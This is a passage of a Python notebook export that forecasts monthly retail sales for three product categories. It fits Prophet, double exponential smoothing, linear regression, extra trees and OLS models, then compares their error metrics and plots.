In[190]:\n\n\nforecast_drinks_and_food.columns\n\n\n# In[191]:\n\n\nforecast_drinks_and_food[['ds','yhat_lower', 'yhat_upper','yhat']].tail(12)\n\n\n# In[194]:\n\n\ny_drinks_and_food\n\n\n# In[195]:\n\n\nactual_values_df = y_drinks_and_food_df['y'].values\npredicted_values_df = forecast_drinks_and_food.loc[:len(actual_values_df)-1, 'yhat'].values\n\npr_errors_df = pd.DataFrame(index=np.arange(len(actual_values_df)))\npr_errors_df['Modelname'] = 'Prophet'\npr_errors_df['Actual'] = actual_values_df\npr_errors_df['Predicted'] = predicted_values_df\npr_errors_df['Error'] = predicted_values_df - actual_values_df\n\n# Calculate the mean squared error (MSE)\nmse_pr_df = mean_squared_error(actual_values_df, predicted_values_df)\n\n# Calculate the mean absolute error (MAE)\nmae_pr_df = mean_absolute_error(actual_values_df, predicted_values_df)\n\n# Calculate the root mean squared error (RMSE)\nrmse_pr_df = np.sqrt(mse_pr_df)\n\n\n# In[196]:\n\n\nm_drinks_and_food.plot(forecast_drinks_and_food);\nplt.title('Sales of drinks_and_food')\nplt.xlabel('Years')\nplt.ylabel('Sales')\n\n\n# In[197]:\n\n\nfrom prophet.plot import plot_plotly, plot_components_plotly\nplot_plotly(m_drinks_and_food, forecast_drinks_and_food)\nforecast_drinks_and_food.plot(x='ds',y='yhat',figsize=(12,5))\n\n\n# In[198]:\n\n\nm_drinks_and_food.plot_components(forecast_drinks_and_food);\n\n\n# In[199]:\n\n\nplot_components_plotly(m_drinks_and_food , forecast_drinks_and_food)\n\n\n# ## Fast Moving Consumer Goods\n\n# In[200]:\n\n\ny_fast_moving_consumer_goods_df = y_fast_moving_consumer_goods.to_frame()\ny_fast_moving_consumer_goods_df['ds'] = y_fast_moving_consumer_goods_df.index\ny_fast_moving_consumer_goods_df.columns = ['y','ds']\ny_fast_moving_consumer_goods_df\n\n\n# In[201]:\n\n\ny_fast_moving_consumer_goods_df.info()\n\n\n# In[202]:\n\n\nm_fast_moving_consumer_goods = Prophet()\nm_fast_moving_consumer_goods.fit(y_fast_moving_consumer_goods_df)\n\n\n# In[203]:\n\n\nfuture_fast_moving_consumer_goods = m_fast_moving_consumer_goods.make_future_dataframe(periods=24,freq='MS')\nfuture_fast_moving_consumer_goods\n\n\n# In[204]:\n\n\nforecast_fast_moving_consumer_goods = m_fast_moving_consumer_goods.predict(future_fast_moving_consumer_goods)\nforecast_fast_moving_consumer_goods\n\n\n# In[205]:\n\n\nforecast_fast_moving_consumer_goods.columns\n\n\n# In[206]:\n\n\nforecast_fast_moving_consumer_goods[['ds','yhat_lower', 'yhat_upper','yhat']].tail(12)\n\n\n# In[207]:\n\n\nactual_values_fmcg = y_fast_moving_consumer_goods_df['y'].values\npredicted_values_fmcg = forecast_fast_moving_consumer_goods.loc[:len(actual_values_fmcg)-1, 'yhat'].values\n\npr_errors_fmcg = pd.DataFrame(index=np.arange(len(actual_values_fmcg)))\npr_errors_fmcg['Modelname'] = 'Prophet'\npr_errors_fmcg['Actual'] = actual_values_fmcg\npr_errors_fmcg['Predicted'] = predicted_values_fmcg\npr_errors_fmcg['Error'] = predicted_values_fmcg - actual_values_fmcg\n\n# Calculate the mean squared error (MSE)\nmse_pr_fmcg = mean_squared_error(actual_values_fmcg, predicted_values_fmcg)\n\n# Calculate the mean absolute error (MAE)\nmae_pr_fmcg = mean_absolute_error(actual_values_fmcg, predicted_values_fmcg)\n\n# Calculate the root mean squared error (RMSE)\nrmse_pr_fmcg = np.sqrt(mse_pr_fmcg)\n\n\n# In[208]:\n\n\nm_fast_moving_consumer_goods.plot(forecast_fast_moving_consumer_goods);\nplt.title('Sales of fast_moving_consumer_goods')\nplt.xlabel('Years')\nplt.ylabel('Sales')\n\n\n# In[209]:\n\n\nfrom prophet.plot import plot_plotly, 
plot_components_plotly\nplot_plotly(m_fast_moving_consumer_goods, forecast_fast_moving_consumer_goods)\nforecast_fast_moving_consumer_goods.plot(x='ds',y='yhat',figsize=(12,5))\n\n\n# In[210]:\n\n\nm_fast_moving_consumer_goods.plot_components(forecast_fast_moving_consumer_goods);\n\n\n# In[211]:\n\n\nplot_components_plotly(m_fast_moving_consumer_goods, forecast_fast_moving_consumer_goods)\n\n\n# ## Others\n\n# In[212]:\n\n\ny_others_df = y_others.to_frame()\ny_others_df['ds'] = y_others_df.index\ny_others_df.columns = ['y','ds']\ny_others_df\n\n\n# In[213]:\n\n\ny_others_df.info()\n\n\n# In[214]:\n\n\nm_others = Prophet()\nm_others.fit(y_others_df)\n\n\n# In[215]:\n\n\nfuture_others = m_others.make_future_dataframe(periods=24,freq='MS')\nfuture_others\n\n\n# In[216]:\n\n\nforecast_others = m_others.predict(future_others)\nforecast_others\n\n\n# In[217]:\n\n\nforecast_others.columns\n\n\n# In[218]:\n\n\nforecast_others[['ds','yhat_lower', 'yhat_upper','yhat']].tail(12)\n\n\n# In[219]:\n\n\nactual_values_others = y_others_df['y'].values\npredicted_values_others = forecast_others.loc[:len(actual_values_others)-1, 'yhat'].values\n\npr_errors_others = pd.DataFrame(index=np.arange(len(actual_values_others)))\npr_errors_others['Modelname'] = 'Prophet'\npr_errors_others['Actual'] = actual_values_others\npr_errors_others['Predicted'] = predicted_values_others\npr_errors_others['Error'] = predicted_values_others - actual_values_others\n\n# Calculate the mean squared error (MSE)\nmse_pr_others = mean_squared_error(actual_values_others, predicted_values_others)\n\n# Calculate the mean absolute error (MAE)\nmae_pr_others = mean_absolute_error(actual_values_others, predicted_values_others)\n\n# Calculate the root mean squared error (RMSE)\nrmse_pr_others = np.sqrt(mse_pr_others)\n\n\n# In[220]:\n\n\nm_others.plot(forecast_others);\nplt.title('Sales of others')\nplt.xlabel('Years')\nplt.ylabel('Sales')\n\n\n# In[221]:\n\n\nfrom prophet.plot import plot_plotly, plot_components_plotly\nplot_plotly(m_others, forecast_others)\nforecast_others.plot(x='ds',y='yhat',figsize=(12,5))\n\n\n# In[222]:\n\n\nm_others.plot_components(forecast_others);\n\n\n# In[223]:\n\n\nplot_components_plotly(m_others, forecast_others)\n\n\n# # ---------------------------------------------------------------------------------------\n\n# NOTE: Simple exponential smoothing is not suitable for seasonal data, so it was not used. Triple exponential smoothing needs a minimum of 24 data entries to fit; with only 25 monthly records in total (20 of which form the training split) there is not enough data, so it was dropped as well.\n\n# # Double-Exponential Smoothing\n\n# ## Product Wise Modelling\n\n# ###### Splitting data (Train=80%, Test=20%)\n\n# In[224]:\n\n\n# Split the time series data (Train-20, Test-6)\n#retail_data = retail_data.set_index('StartDate')\nprint('Total records in dataset:', len(sales_monthly))\nsales_train = sales_monthly.iloc[0:20]\nsales_test = sales_monthly.iloc[20:]\n\nsales_pred_train = sales_monthly.iloc[0:20]\nsales_pred_test = sales_monthly.iloc[20:]\nprint('Total records in Training set:', len(sales_train))\nprint('Total records in Test set:', len(sales_test))\n\n\n# ###### Plot Train and Test data\n\n# In[225]:\n\n\nimport matplotlib.pyplot as plt\n\nfor col in sales_monthly:\n    sales_train[col].plot(legend=True, label='TRAIN (80%)')\n    sales_test[col].plot(legend=True, label='TEST (20%)', figsize=(12, 8))\n    plt.title(f'Sales of {col}')\n    plt.xlabel('Index')\n    plt.ylabel('Sales')\n    plt.legend()\n    plt.show()\n\n\n# In[226]:\n\n\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\n\n# Background on Holt's additive-trend method is sketched just below.\nfor col in sales_train:\n    
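# Editorial aside (standalone background, not part of the loop that continues below): ExponentialSmoothing(trend='add') fits Holt's linear method, i.e. double exponential smoothing, which updates a level l_t and a trend b_t:
#   l_t = alpha * y_t + (1 - alpha) * (l_{t-1} + b_{t-1})
#   b_t = beta * (l_t - l_{t-1}) + (1 - beta) * b_{t-1}
# and forecasts h steps ahead as l_t + h * b_t. A minimal hand-rolled version for intuition (alpha and beta are arbitrary here; statsmodels optimises them when fitting):
def holt_forecast(y, alpha=0.5, beta=0.5, steps=6):
    level, trend = y[0], y[1] - y[0]
    for value in y[1:]:
        previous_level = level
        level = alpha * value + (1 - alpha) * (level + trend)
        trend = beta * (level - previous_level) + (1 - beta) * trend
    return [level + h * trend for h in range(1, steps + 1)]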
double_model = ExponentialSmoothing(sales_train[col], trend='add').fit()\n doublemodel_preds = double_model.forecast(6).rename('DES Forecast')\n \n # Print the forecasted values\n print(f'\\nDouble Exponential Smoothing (DES) forecast for {col}:\\n')\n #print(doublemodel_preds)\n\n des_errors_df = sales_test[[col]].copy()\n des_errors_df['Predicted_sales'] = doublemodel_preds\n des_errors_df['Error'] = doublemodel_preds - sales_test[col]\n des_errors_df.insert(0, 'Modelname', 'Holtman-DES')\n #print(f'\\nDES Errors for {col}:\\n')\n #print(des_errors_df.head())\n\n\n# Evaluate predictions for Holt Winters-Double Exponential Smoothing\n fig = plt.figure(figsize=(14,7))\n plt.plot(sales_train.index, sales_train[col], label='Train')\n plt.plot(sales_test.index, sales_test[col], label='Test')\n plt.plot(des_errors_df.index, des_errors_df['Predicted_sales'], label='Forecast - HW-DES')\n plt.legend(loc='best')\n plt.xlabel('StartDate')\n plt.ylabel('sales')\n plt.title('Forecast using Holt Winters-Double Exponential Smoothing')\n plt.show()\n\n\n# In[227]:\n\n\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\ndes_data = pd.DataFrame(columns=['Product Identifier', 'MSE_d', 'RMSE_d', 'MAE_d'])\nfor col in sales_train:\n double_model = ExponentialSmoothing(sales_train[col], trend='add').fit()\n doublemodel_preds = double_model.forecast(6).rename('DES Forecast')\n \n \n mse=mean_squared_error(doublemodel_preds,sales_test[col])\n rmse=np.sqrt(mse)\n mae=mean_absolute_error(doublemodel_preds,sales_test[col])\n \n des_data = des_data.append({'Product Identifier': col, 'MSE_d': mse, 'RMSE_d': rmse, 'MAE_d': mae},ignore_index=True)\n\n\n# In[228]:\n\n\ndes_data\n\n\n# ## ==================================================\n\n# # Category Wise Modelling\n\n# # Splitting Dataset\n\n# In[229]:\n\n\ndrinks_and_food_x = drinks_and_food_en.drop(['sales','sell_price','week_id','year','month','day'],axis=1)\nfast_moving_consumer_goods_x = fast_moving_consumer_goods_en.drop(['sales','sell_price','week_id','year','month','day'],axis=1)\nothers_x=others_en.drop(['sales','sell_price','week_id','year','month','day'],axis=1)\n\n\n# In[230]:\n\n\ndrinks_and_food_y = drinks_and_food_en['sales']\nfast_moving_consumer_goods_y = fast_moving_consumer_goods_en['sales']\nothers_y=others_en['sales']\n\n\n# In[231]:\n\n\nx_train_df = drinks_and_food_x.iloc[:107440]\nx_test_df = drinks_and_food_x.iloc[107440:]\ny_train_df = drinks_and_food_y.iloc[:107440]\ny_test_df = drinks_and_food_y.iloc[107440:]\n\n\n# In[232]:\n\n\nx_train_fmcg = fast_moving_consumer_goods_x.iloc[:183280]\nx_test_fmcg = fast_moving_consumer_goods_x.iloc[183280:]\ny_train_fmcg = fast_moving_consumer_goods_y.iloc[:183280]\ny_test_fmcg = fast_moving_consumer_goods_y.iloc[183280:]\n\n\n# In[233]:\n\n\nx_train_others = others_x.iloc[:25280]\nx_test_others = others_x.iloc[25280:]\ny_train_others = others_y.iloc[:25280]\ny_test_others = others_y.iloc[25280:]\n\n\n# # --------------------------------------------------------------------------------\n\n# # Linear regression\n\n# ## Drinks and food\n\n# In[234]:\n\n\nfrom sklearn.linear_model import LinearRegression\nlr_model = LinearRegression()\nlr_model.fit(x_train_df, y_train_df)\n\nlr_preds1 = lr_model.predict(x_test_df)\n\n\n# In[235]:\n\n\nlr_errors_df = pd.DataFrame(index=y_test_df.index)\nlr_errors_df['Modelname'] = 'Linear Regression'\nlr_errors_df['Actual'] = y_test_df\nlr_errors_df['Predicted'] = lr_preds1\nlr_errors_df['Error'] = lr_preds1 - y_test_df\nlr_errors_df.head()\n\n\n# 
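# Editorial sketch (hypothetical helper, not in the original script): every model section from here on recomputes the same MAE/MSE/RMSE trio; a single helper would keep those computations consistent.
import numpy as np
from sklearn.metrics import mean_absolute_error, mean_squared_error

def regression_metrics(y_true, y_pred):
    mae = mean_absolute_error(y_true, y_pred)
    mse = mean_squared_error(y_true, y_pred)
    rmse = np.sqrt(mse)
    return mae, mse, rmse

# e.g. mae_lr_df, mse_lr_df, rmse_lr_df = regression_metrics(y_test_df, lr_preds1)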
In[236]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_lr_df = mean_absolute_error(y_test_df, lr_preds1)\n\n# Calculate the mean squared error (MSE)\nmse_lr_df = mean_squared_error(y_test_df, lr_preds1)\n# Calculate the root mean squared error (RMSE)\nrmse_lr_df = np.sqrt(mse_lr_df)\n\n\n# In[237]:\n\n\ny_train_df1 = y_train_df.resample('M').mean()\n\nlr_errors_df1 = lr_errors_df.resample('M').mean()\n\n# Convert the index to datetime\ny_test_df1=y_test_df.copy()\ny_test_df1.index = pd.to_datetime(y_test_df1.index)\n\n# Resample the Series based on month\ny_test_df1 = y_test_df1.resample('M').mean()\n\n\n# In[238]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_df1.index, y_train_df1, label='Train',linewidth=3)\nplt.plot(y_test_df1.index, y_test_df1, label='Test',linewidth=3)\nplt.plot(lr_errors_df1.index, lr_errors_df1['Predicted'], label='Forecast - Linear Regression',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Linear Regression')\nplt.show()\n\n\n# In[239]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(lr_errors_df1.index, lr_errors_df1.Error, label='Error',linewidth=3)\nplt.plot(lr_errors_df1.index, lr_errors_df1.Actual, label='Actual Sales',linewidth=3)\nplt.plot(lr_errors_df1.index, lr_errors_df1.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Linear Regression Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# ## Fast Moving Consumer Goods\n\n# In[240]:\n\n\nfrom sklearn.linear_model import LinearRegression\nlr_model = LinearRegression()\nlr_model.fit(x_train_fmcg, y_train_fmcg)\n\nlr_preds2 = lr_model.predict(x_test_fmcg)\n\n\n# In[241]:\n\n\nlr_errors_fmcg = pd.DataFrame(index=y_test_fmcg.index)\nlr_errors_fmcg['Modelname'] = 'Linear Regression'\nlr_errors_fmcg['Actual'] = y_test_fmcg\nlr_errors_fmcg['Predicted'] = lr_preds2\nlr_errors_fmcg['Error'] = lr_preds2 - y_test_fmcg\nlr_errors_fmcg.head()\n\n\n# In[242]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_lr_fmcg = mean_absolute_error(y_test_fmcg, lr_preds2)\n\n# Calculate the mean squared error (MSE)\nmse_lr_fmcg = mean_squared_error(y_test_fmcg, lr_preds2)\n# Calculate the root mean squared error (RMSE)\nrmse_lr_fmcg = np.sqrt(mse_lr_fmcg)\n\n\n# ## Plotting\n\n# In[243]:\n\n\ny_train_fmcg1 = y_train_fmcg.resample('M').mean()\n\nlr_errors_fmcg1 = lr_errors_fmcg.resample('M').mean()\n\n# Convert the index to datetime\ny_test_fmcg1=y_test_fmcg.copy()\ny_test_fmcg1.index = pd.to_datetime(y_test_fmcg1.index)\n\n# Resample the Series based on month\ny_test_fmcg1 = y_test_fmcg1.resample('M').mean()\n\n\n# In[244]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_fmcg1.index, y_train_fmcg1, label='Train',linewidth=3)\nplt.plot(y_test_fmcg1.index, y_test_fmcg1, label='Test',linewidth=3)\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1['Predicted'], label='Forecast - Linear Regression',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Linear Regression')\nplt.show()\n\n\n# In[245]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1.Error, label='Error',linewidth=3)\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1.Actual, label='Actual Sales',linewidth=3)\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1.Predicted, 
label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Linear Regression Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Others\n\n# In[246]:\n\n\nfrom sklearn.linear_model import LinearRegression\nlr_model = LinearRegression()\nlr_model.fit(x_train_others, y_train_others)\n\nlr_preds3 = lr_model.predict(x_test_others)\n\n\n# In[247]:\n\n\nlr_errors_others = pd.DataFrame(index=y_test_others.index)\nlr_errors_others['Modelname'] = 'Linear Regression'\nlr_errors_others['Actual'] = y_test_others\nlr_errors_others['Predicted'] = lr_preds3\nlr_errors_others['Error'] = lr_preds3 - y_test_others\nlr_errors_others.head()\n\n\n# In[248]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_lr_others = mean_absolute_error(y_test_others, lr_preds3)\n\n# Calculate the mean squared error (MSE)\nmse_lr_others = mean_squared_error(y_test_others, lr_preds3)\n\n# Calculate the root mean squared error (RMSE)\nrmse_lr_others = np.sqrt(mse_lr_others)\n\n\n# ## Plotting\n\n# In[249]:\n\n\ny_train_others1 = y_train_others.resample('M').mean()\n\nlr_errors_others1 = lr_errors_others.resample('M').mean()\n\n# Convert the index to datetime\ny_test_others1=y_test_others.copy()\ny_test_others1.index = pd.to_datetime(y_test_others1.index)\n\n# Resample the Series based on month\ny_test_others1 = y_test_others1.resample('M').mean()\n\n\n# In[250]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_others1.index, y_train_others1, label='Train',linewidth=3)\nplt.plot(y_test_others1.index, y_test_others1, label='Test',linewidth=3)\nplt.plot(lr_errors_others1.index, lr_errors_others1['Predicted'], label='Forecast - Linear Regression',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Linear Regression')\nplt.show()\n\n\n# In[251]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(lr_errors_others1.index, lr_errors_others1.Error, label='Error',linewidth=3)\nplt.plot(lr_errors_others1.index, lr_errors_others1.Actual, label='Actual Sales',linewidth=3)\nplt.plot(lr_errors_others1.index, lr_errors_others1.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Linear Regression Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # ---------------------------------------------------------------------------\n\n# # Extra Tree Regressor\n\n# In[252]:\n\n\nfrom sklearn.ensemble import ExtraTreesRegressor\n\n\n# ## Drinks and Food\n\n# In[253]:\n\n\n# fit model\netr_model = ExtraTreesRegressor(n_estimators=100)\netr_model.fit(x_train_df, y_train_df)\n\netr_preds1 = etr_model.predict(x_test_df)\nprint('Prediction is done..')\n\n\n# In[254]:\n\n\netr_errors_df = pd.DataFrame(index=y_test_df.index)\netr_errors_df['Modelname'] = 'Extra Trees Regressor'\netr_errors_df['Actual'] = y_test_df\netr_errors_df['Predicted'] = etr_preds1\netr_errors_df['Error'] = etr_preds1 - y_test_df\netr_errors_df.head()\n\n\n# In[255]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_etr_df = mean_absolute_error(y_test_df, etr_preds1)\n\n# Calculate the mean squared error (MSE)\nmse_etr_df = mean_squared_error(y_test_df, etr_preds1)\n# Calculate the root mean squared error (RMSE)\nrmse_etr_df = np.sqrt(mse_etr_df)\n\n\n# In[256]:\n\n\ny_train_df2 = y_train_df.resample('M').mean()\n\netr_errors_df2 = etr_errors_df.resample('M').mean()\n\n# Convert the index to 
datetime\ny_test_df2=y_test_df.copy()\ny_test_df2.index = pd.to_datetime(y_test_df2.index)\n\n# Resample the Series based on month\ny_test_df2 = y_test_df2.resample('M').mean()\n\n\n# In[257]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_df2.index, y_train_df2, label='Train',linewidth=3)\nplt.plot(y_test_df2.index, y_test_df2, label='Test',linewidth=3)\nplt.plot(etr_errors_df2.index, etr_errors_df2['Predicted'], label='Forecast - Extra Tree Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Extra Tree Regressor')\nplt.show()\n\n\n# In[258]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(etr_errors_df2.index, etr_errors_df2.Error, label='Error',linewidth=3)\nplt.plot(etr_errors_df2.index, etr_errors_df2.Actual, label='Actual Sales',linewidth=3)\nplt.plot(etr_errors_df2.index, etr_errors_df2.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Extra Tree Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Fast Moving Consumer Goods\n\n# In[259]:\n\n\n# fit model\netr_model = ExtraTreesRegressor(n_estimators=100)\netr_model.fit(x_train_fmcg, y_train_fmcg)\n\netr_preds2 = etr_model.predict(x_test_fmcg)\nprint('Prediction is done..')\n\n\n# In[260]:\n\n\netr_errors_fmcg = pd.DataFrame(index=y_test_fmcg.index)\netr_errors_fmcg['Modelname'] = 'Extra Trees Regressor'\netr_errors_fmcg['Actual'] = y_test_fmcg\netr_errors_fmcg['Predicted'] = etr_preds2\netr_errors_fmcg['Error'] = etr_preds2 - y_test_fmcg\netr_errors_fmcg.head()\n\n\n# In[261]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_etr_fmcg = mean_absolute_error(y_test_fmcg, etr_preds2)\n\n# Calculate the mean squared error (MSE)\nmse_etr_fmcg = mean_squared_error(y_test_fmcg, etr_preds2)\n# Calculate the root mean squared error (RMSE)\nrmse_etr_fmcg = np.sqrt(mse_etr_fmcg)\n\n\n# In[262]:\n\n\ny_train_fmcg2 = y_train_fmcg.resample('M').mean()\n\netr_errors_fmcg2 = etr_errors_fmcg.resample('M').mean()\n\n# Convert the index to datetime\ny_test_fmcg2=y_test_fmcg.copy()\ny_test_fmcg2.index = pd.to_datetime(y_test_fmcg2.index)\n\n# Resample the Series based on month\ny_test_fmcg2 = y_test_fmcg2.resample('M').mean()\n\n\n# In[263]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_fmcg2.index, y_train_fmcg2, label='Train',linewidth=3)\nplt.plot(y_test_fmcg2.index, y_test_fmcg2, label='Test',linewidth=3)\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2['Predicted'], label='Forecast - Extra Tree Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Extra Tree Regressor')\nplt.show()\n\n\n# In[264]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2.Error, label='Error',linewidth=3)\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2.Actual, label='Actual Sales',linewidth=3)\nplt.plot(etr_errors_fmcg2.index, etr_errors_fmcg2.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Extra Tree Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Others\n\n# In[265]:\n\n\n# fit model\netr_model = ExtraTreesRegressor(n_estimators=100)\netr_model.fit(x_train_others, y_train_others)\n\netr_preds3 = etr_model.predict(x_test_others)\nprint('Prediction is done..')\n\n\n# 
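# Editorial sketch (hypothetical refactor, not in the original script): the Modelname/Actual/Predicted/Error frame assembled below is rebuilt for every model and category; a shared constructor keeps the copies identical.
import pandas as pd

def build_error_table(model_name, y_true, y_pred):
    errors = pd.DataFrame(index=y_true.index)
    errors['Modelname'] = model_name
    errors['Actual'] = y_true
    errors['Predicted'] = y_pred
    errors['Error'] = y_pred - y_true
    return errors

# e.g. etr_errors_others = build_error_table('Extra Trees Regressor', y_test_others, etr_preds3)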
In[266]:\n\n\netr_errors_others = pd.DataFrame(index=y_test_others.index)\netr_errors_others['Modelname'] = 'Extra Trees Regressor'\netr_errors_others['Actual'] = y_test_others\netr_errors_others['Predicted'] = etr_preds3\netr_errors_others['Error'] = etr_preds3 - y_test_others\netr_errors_others.head()\n\n\n# In[267]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_etr_others = mean_absolute_error(y_test_others, etr_preds3)\n\n# Calculate the mean squared error (MSE)\nmse_etr_others = mean_squared_error(y_test_others, etr_preds3)\n# Calculate the root mean squared error (RMSE)\nrmse_etr_others = np.sqrt(mse_etr_others)\n\n\n# In[268]:\n\n\ny_train_others2 = y_train_others.resample('M').mean()\n\netr_errors_others2 = etr_errors_others.resample('M').mean()\n\n# Convert the index to datetime\ny_test_others2=y_test_others.copy()\ny_test_others2.index = pd.to_datetime(y_test_others2.index)\n\n# Resample the Series based on month\ny_test_others2 = y_test_others2.resample('M').mean()\n\n\n# In[269]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_others2.index, y_train_others2, label='Train',linewidth=3)\nplt.plot(y_test_others2.index, y_test_others2, label='Test',linewidth=3)\nplt.plot(etr_errors_others2.index, etr_errors_others2['Predicted'], label='Forecast - Extra Tree Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Extra Tree Regressor')\nplt.show()\n\n\n# In[270]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(etr_errors_others2.index, etr_errors_others2.Error, label='Error',linewidth=3)\nplt.plot(etr_errors_others2.index, etr_errors_others2.Actual, label='Actual Sales',linewidth=3)\nplt.plot(etr_errors_others2.index, etr_errors_others2.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Extra Tree Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # --------------------------------------------------------------------------\n\n# # Multiple Linear regression\n\n# In[271]:\n\n\nimport statsmodels.api as sm\n\n\n# # Drinks and Food\n\n# In[272]:\n\n\n# Fit the OLS model\nml_model = sm.OLS(y_train_df, x_train_df).fit()\n\n# Make predictions on the test data\nml_preds1 = ml_model.predict(x_test_df)\n\n\n# In[273]:\n\n\nml_errors_df = pd.DataFrame(index=y_test_df.index)\nml_errors_df['Modelname'] = 'Multi Linear Regression'\nml_errors_df['Actual'] = y_test_df\nml_errors_df['Predicted'] = ml_preds1\nml_errors_df['Error'] = ml_preds1 - y_test_df\nml_errors_df.head()\n\n\n# In[274]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_ml_df = mean_absolute_error(y_test_df, ml_preds1)\n\n# Calculate the mean squared error (MSE)\nmse_ml_df = mean_squared_error(y_test_df, ml_preds1)\n# Calculate the root mean squared error (RMSE)\nrmse_ml_df = np.sqrt(mse_ml_df)\n\n\n# In[275]:\n\n\ny_train_df3 = y_train_df.resample('M').mean()\n\nml_errors_df3 = ml_errors_df.resample('M').mean()\n\n# Convert the index to datetime\ny_test_df3=y_test_df.copy()\ny_test_df3.index = pd.to_datetime(y_test_df3.index)\n\n# Resample the Series based on month\ny_test_df3 = y_test_df3.resample('M').mean()\n\n\n# In[276]:\n\n\n# Evaluate predictions for Multiple Linear Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_df3.index, y_train_df3, label='Train',linewidth=3)\nplt.plot(y_test_df3.index, y_test_df3, label='Test',linewidth=3)\nplt.plot(ml_errors_df3.index, ml_errors_df3['Predicted'], 
label='Forecast - Multiple Linear Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Multiple Linear Regression')\nplt.show()\n\n\n# In[277]:\n\n\n# Evaluate predictions for Multiple Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(ml_errors_df3.index, ml_errors_df3.Error, label='Error',linewidth=3)\nplt.plot(ml_errors_df3.index, ml_errors_df3.Actual, label='Actual Sales',linewidth=3)\nplt.plot(ml_errors_df3.index, ml_errors_df3.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Multiple Linear Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Fast Moving Consumer Goods\n\n# In[278]:\n\n\n# Fit the OLS model\nml_model = sm.OLS(y_train_fmcg, x_train_fmcg).fit()\n\n# Make predictions on the test data\nml_preds2 = ml_model.predict(x_test_fmcg)\n\n\n# In[279]:\n\n\nml_errors_fmcg = pd.DataFrame(index=y_test_fmcg.index)\nml_errors_fmcg['Modelname'] = 'Multi Linear Regression'\nml_errors_fmcg['Actual'] = y_test_fmcg\nml_errors_fmcg['Predicted'] = ml_preds2\nml_errors_fmcg['Error'] = ml_preds2 - y_test_fmcg\nml_errors_fmcg.head()\n\n\n# In[280]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_ml_fmcg = mean_absolute_error(y_test_fmcg, ml_preds2)\n\n# Calculate the mean squared error (MSE)\nmse_ml_fmcg = mean_squared_error(y_test_fmcg, ml_preds2)\n# Calculate the root mean squared error (RMSE)\nrmse_ml_fmcg = np.sqrt(mse_ml_fmcg)\n\n\n# In[281]:\n\n\ny_train_fmcg3 = y_train_fmcg.resample('M').mean()\n\nml_errors_fmcg3 = ml_errors_fmcg.resample('M').mean()\n\n# Convert the index to datetime\ny_test_fmcg3 = 